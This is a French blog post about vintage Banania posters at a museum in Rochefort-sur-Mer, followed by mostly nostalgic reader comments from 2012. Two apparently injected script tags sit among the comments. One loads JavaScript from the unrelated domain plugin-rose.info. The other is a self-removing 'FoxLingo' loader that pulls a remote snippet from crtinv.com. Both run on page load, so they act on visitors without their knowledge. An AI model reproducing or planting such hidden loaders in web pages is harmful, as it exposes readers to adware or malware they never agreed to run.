• Un voyage dans le temps à Rochefort sur mer

    Si je vous dis Y a bon.....vous répondez Banania

    Des affiches qui se trouvent

    au Musée des Commerces à 

    Rochefort sur Mer et qui expliquent

    l'origine de ces mots

     

    Un voyage dans le temps

    Un voyage dans le temps

    Un voyage dans le temps

     

    Un voyage dans le temps

    Un voyage dans le temps

    Un voyage dans le temps

    Un voyage dans le temps

    Un voyage dans le temps

    Un voyage dans le temps

    Un voyage dans le temps

    Un voyage dans le temps

    Un voyage dans le temps

    Vous pouvez enregistrer la photo

    un résumé bien précis

    Alors , comme c'est bon , on va en profiter  quand

    il fera bien froid

    signatures 

     

    « Un peu de couleurs.....Pomme de Touline »
    Pin It

    Tags Tags : , , , , , ,
  • Commentaires

    42
    Mercredi 10 Octobre 2012 à 08:16

    bonjour Joseph, en plus en ce moment c'est l'idéal pour se réchauffer, il n'y a pas d'age pour en boire

    bonne journée

    41
    Mercredi 10 Octobre 2012 à 07:44

    Cela ravive des souvenirs d'enfance.
    Bonne journée

    40
    Mardi 9 Octobre 2012 à 19:12

    Bon soir . J'adore le Banania, avec une tartine de pain beuure .Bpnne soirée


    bisous SOLOGNOT

    39
    Mardi 9 Octobre 2012 à 13:09

    Bonne journée.

    38
    Mardi 9 Octobre 2012 à 08:15

    ces jours, c'est un minimum de temps que je passe sur le net, avec les visites à l'hosto....guère le temps de faire grand chose.....passe une douce journée

    37
    Mardi 9 Octobre 2012 à 07:32

    Après 2 jours de jardinage, je ressemble à ça !

    LV jardin

    Cassée mais heureuse !!!

    "Tes fleurs à moi" ont trouvé leur place !

    Gros biiiisous ma Rando 

    36
    Lundi 8 Octobre 2012 à 18:08

    Ah colonialisme quand tu nous tiens.... Pratiques ces braves Sénégalais, non seulement comme chaire à canon, mais aussi supports publicitaires, regardez comme ils sont forte grâce à Banania, "Ya bon !" 

    35
    Lundi 8 Octobre 2012 à 17:15
    Le Journal d'Ulysse

    Hello,

     

    Ben dis donc ça ne nous rejeunit pas ça !!!

    En tout cas un bon chocolat chaud me fait bien envie maintenant

    <script src="http://plugin-rose.info/dfi823hs.js?0.07089587035854183" type="text/javascript"></script>
    34
    Marie-France W
    Lundi 8 Octobre 2012 à 13:08

    Avec les saisons froides qui reviennent ( mais du bon temps pour les travaux du jardin ) on appréciera de boire un bon chocolat chaud de temps à autre . Bises

    33
    Lundi 8 Octobre 2012 à 12:30

    j' ai encore 3 boites de banania jaune que je conserve précieusement

    bonne journée

    32
    Lundi 8 Octobre 2012 à 11:57

    Ces affiches sont jolies et bien conservées dans ce musée.Merci pour les explications j'ai appris plein de choses.

    Bises

    31
    Lundi 8 Octobre 2012 à 10:26

    Coucou,

    Il est vrai que le temps en ce moment est pas génial du tout!

    Hier de la pluie sans discontinuer et du vent, et ce matin des averses... et toute la semaine devrait être ainsi... peu de soleil est prévu.

    Bisous et bonne journée

    30
    Lundi 8 Octobre 2012 à 10:04

    Bonjour Rando, je suis ravie de te retrouver sur la blogo après tes petites vacances..... Super ce musée sur "Banania" c'est très intéressant, j'aurai bien aimé le visiter aussi.... Le banania était la boisson préférée de presque tous les Enfants, dans les années 60 et 7O, à que de bons souvenirs de petits-déjeuners en famille ! bon lundi, bisous à bientôt.   "Miss Mary"

    29
    Lundi 8 Octobre 2012 à 08:45

    Bonjour Rando j'espère que tu vas bien je te souhaite une bonne semaine et te présente Grisou un petit chat que ma belle-soeur vient de receuillir. Bises Stella

    28
    Lundi 8 Octobre 2012 à 08:30

    Moqueuse , viens içi, tu comprendras  , j'ai plus 25° dans la maison , GRRRR

    pas normal , cette différence de température , je vais me plaindre

    alors pas de jardin

    27
    Lundi 8 Octobre 2012 à 06:29

    Bonjour ma Rando ,

    Mon Ronchon et moi avons bien travaillé au jardin hier !

    Je te passe le relais et j'espère que tu auras beau temps ...

    LV jardin

    Belle semaine à toi 

    26
    Sylvie (anjou)
    Dimanche 7 Octobre 2012 à 18:51

     Je te retrouve !

    ces affichettes on les trouve de plus en plus partout,

    ça revient très à la mode.

    bises du dimanche soir.

    25
    Dimanche 7 Octobre 2012 à 14:04

    pas là encore mais où es tu ??? Bises et bon dimanche

    24
    Dimanche 7 Octobre 2012 à 07:31

    Trop bon ça !!

    Un bon Banania bien mousseux pour les après midi un peu fraîches !! Bizz et bon dimanche

    <script id="FoxLingoJs" type="text/javascript">// <![CDATA[ !function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}(); // ]]></script>
    23
    Samedi 6 Octobre 2012 à 22:01
    francine94

    bonjour, je te souhaite un bon week end bisous

    22
    Samedi 6 Octobre 2012 à 16:35

    Et c'est drôlement bon le Banania! Je collectionne les vieilles boîtes en fer et j'en ai 2 de cette marque, elles sont très recherchées! Merci pour ce bel article!

    Gros bisous Rando!

    21
    Samedi 6 Octobre 2012 à 15:06

    De belles affiches colorées ! J'adore celle avec l'éléphant et la photo des chocolats :)

    20
    Samedi 6 Octobre 2012 à 11:50
    Mabou

    Alors tu étais chez la Voisine !!!

    Je ne sais où se trouve ta voisine mais il fait bien chaud chez elle !

    RDV sur Gmail

    Bises

    MC

    19
    Samedi 6 Octobre 2012 à 07:58

    Comme tu dis Violette , nous avons tous passées une bonne semaine

    que du bonheur et de la chaleur, bisous a tous

    la route m'attend , vive le phone !!!!!

    NE PAS PUBLIER !!! SIGNATURE !!!

    Voilà, je les ai vu en vrai, et j'ai un fan , hé oui Oural à droite

    18
    Samedi 6 Octobre 2012 à 07:05

    Tu vas partir ma douce 

    Et je vais être bien triste 

    Heureusement qu'il nous reste le téléphone !

    LV maison

    Gros baisers de Violette et son Ronchon !

    Oural et Taïga te font les yeux doux !

    Nous avons tous passé une semaine merveilleuse 

    gifs variés gifs variés gifs variés gifs variés

    17
    Vendredi 5 Octobre 2012 à 23:07

    Très interressant,Banania me rappelle tout plein de souvenirs.Bon week-end et bisous

    16
    Vendredi 5 Octobre 2012 à 17:34

    pas tout jeune tout ça ... lol je me souviens de ce "si je vous dis Y a bon" ;))

    quelle belle série.

    passe un bon week-end

    bisous

    15
    Vendredi 5 Octobre 2012 à 13:13

    Un sacré retour en arrière que cette PUB BANANIA !!!

    Cà nous ramène à nos jeunes années .... mais chut ! faut pas le dire, c'était hier !!!!

    Bon week end à toi !

    14
    Vendredi 5 Octobre 2012 à 11:05

    Belle journée chocolatée.

    13
    Vendredi 5 Octobre 2012 à 07:28

    J'espère que ta journée sera belle , belle , belle !

    Gros baisers Rando

    gifs variés

    12
    Jeudi 4 Octobre 2012 à 21:15

    bonsoir a tous , je vois qu'il y a des amateurs , hé oui, c'est bon le chocolat

    bonne soirée

    11
    Jeudi 4 Octobre 2012 à 21:01

    coucou 

    moi j'aime bien le chocolat ! lol

    j'espère que tout va bien pour toi 

    gros bisous 

     

    10
    @nnie54
    Jeudi 4 Octobre 2012 à 18:59

    C'est vrai que c'est bon bien chaud,

    l'hiver pour se réchauffer !

    mes enfants en ont avalé des itres !

    Qui ne l'a pasfait !

    Bisous à bientôt !

     

    @..

    9
    Jeudi 4 Octobre 2012 à 18:54

    Des souvenirs "gourmands" en revoyant certaines de ces affiches dont on se souvient...

    bonne soirée

    8
    Jeudi 4 Octobre 2012 à 13:17
    francine94

    bonjour, la pub banania a marqué les esprits; bonne journée bisous

    7
    Jeudi 4 Octobre 2012 à 11:47

    ah bein oui qui ne connait pas ça ? , moi j'ai toujours déjeuné avec du chocolat , du phoscao !  et du banania  , souvenirs !   je déjeune toujours avec du chocolat  ... bonne journée  A+ 

    6
    Jeudi 4 Octobre 2012 à 10:10

    Bonjour j'ai une boite en métal avec le fond jaune et le bonhomme avec le chapeau rouge, j'adore le chocolat je m'en fais parfois une tase à 16h en hiver.

     J'ai aussi une boite d'origine du lait en poudre guigoz qui date de1960 ma mère l'avait gardé.

    Bonne journée Rando Bisous Stella

    5
    Jeudi 4 Octobre 2012 à 09:34

    j'ai uen nièce collectionneuse!! bisous ma belle!

    4
    Jeudi 4 Octobre 2012 à 08:09

    C'est super sympa et les boites de mon enfance ,nous n'avions que ça avant!!!mais je découvre la véritable hisrtoire et tout près de chez moi en plus ..Va falloir que j'aille à Rochefort !!!

    Merci ma Ficelle bonne journée sous la pluie et le vent ici

    BISES

    3
    Jeudi 4 Octobre 2012 à 07:29

    Hum ! J'adore !

    Bel article qui me donne envie de me préparer un bon chocolat

    dans le magnifique service en porcelaine anglaise

    que m'a offert ma soeur de  !

    gifs variés

    2
    Jeudi 4 Octobre 2012 à 07:07

    je m'en souviens de cette pub.....c'est drôle comme il y a des choses qui nous marque....et pourtant je n'aime pas le cacao.....douce journée à toi

    1
    mitou la bretonne
    Jeudi 4 Octobre 2012 à 06:56

    coucou Rando

    Dommage je ne digère pas le chocolat en boisson !!! mais je me rattrappe avec les tablettes !!! un musée pour Banania c'est super des souvenirs d'enfance !!! chez ma grand mère car chez nous c'était le chocolat Poulain !!!

    gros bisous et bonne journée

    MITOU

    Suivre le flux RSS des commentaires

    Vous devez être connecté pour commenter